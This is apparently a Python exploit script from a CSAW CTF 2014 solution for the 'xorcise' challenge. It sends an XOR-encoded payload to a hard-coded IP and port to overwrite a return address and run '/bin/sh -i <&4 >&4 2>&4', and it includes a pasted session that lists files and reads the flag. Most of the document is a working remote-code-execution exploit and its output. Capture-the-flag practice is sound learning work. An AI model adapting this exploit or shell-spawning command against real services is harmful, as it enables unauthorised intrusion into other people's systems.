CSAW CTF 2014 - xorcise exploit
#!/usr/bin/env python | |
import struct, sys, time | |
from nulllife import * | |
#CSAW 2014 CTF | |
#xorcise exploit | |
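def xor(data, key):
    """XOR-encode *data* with a repeating *key* and the fixed byte 0x8F.

    Each output character is ``data[i] ^ key[i % len(key)] ^ 0x8F``; the key
    is cycled for as long as there is data left.

    Args:
        data: String to encode; each character is treated as one byte value.
        key: Non-empty string of key bytes. An empty key raises
            ZeroDivisionError as soon as there is data to encode.

    Returns:
        A string of the same length as *data*; empty *data* gives ''.
    """
    key_len = len(key)
    # NOTE(review): 0x8F is fixed by this script; presumably it mirrors a
    # constant applied by the challenge binary, which is not shown here.
    # join() builds the result in one pass instead of the quadratic ``o += ...``.
    return ''.join(
        chr(ord(ch) ^ ord(key[i % key_len]) ^ 0x8F)
        for i, ch in enumerate(data)
    )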
# Shell command, NUL-padded to a fixed 128 bytes. Its redirections attach the
# shell to descriptor 4 -- presumably the accepted client socket; confirm
# against the challenge source.
cmd = "/bin/sh -i <&4 >&4 2>&4".ljust(128, "\x00")

# Eight key bytes sent ahead of the encoded command. Per the author's note
# they overwrite decipher's return address with the PLT entry for system; the
# target binary is not on this page, so that reading rests on the note alone.
key = "\x8F" + "\x8A" + "\x8F" * 3 + "\x9C" + "\x7B" + "\x99"

# Hard-coded host and port -- presumably the CSAW 2014 challenge service.
s = NullSocket("128.238.66.227", 24001)
# One message: a leading byte of value 135, then the key, then the command
# encoded with that same key.
s.write(''.join([chr(135), key, xor(cmd, key)]))
s.interactive()
''' | |
sh: cannot set terminal process group (134): Inappropriate ioctl for device | |
sh: no job control in this shell | |
sh-4.3$ id | |
id | |
uid=1000(xor) gid=1000(xor) groups=1000(xor) | |
sh-4.3$ ls -la | |
ls -la | |
total 44 | |
drwxr-xr-x 2 root root 4096 Sep 20 00:18 . | |
drwxr-xr-x 3 root root 4096 Sep 14 14:14 .. | |
-rw-r--r-- 1 root root 30 Sep 20 00:18 flag.txt | |
-rw-r--r-- 1 root root 7 Sep 12 19:13 password.txt | |
-rwxr-xr-x 1 root root 12308 Sep 12 19:08 xorcise | |
-rw-r--r-- 1 root root 10248 Sep 10 13:16 xorcise.c | |
sh-4.3$ cat flag.txt | |
ceat flag.txt | |
flag{code_exec>=crypto_break} | |
sh-4.3$ exit | |
exit | |
exit | |
*** Connection closed by remote host *** | |
''' |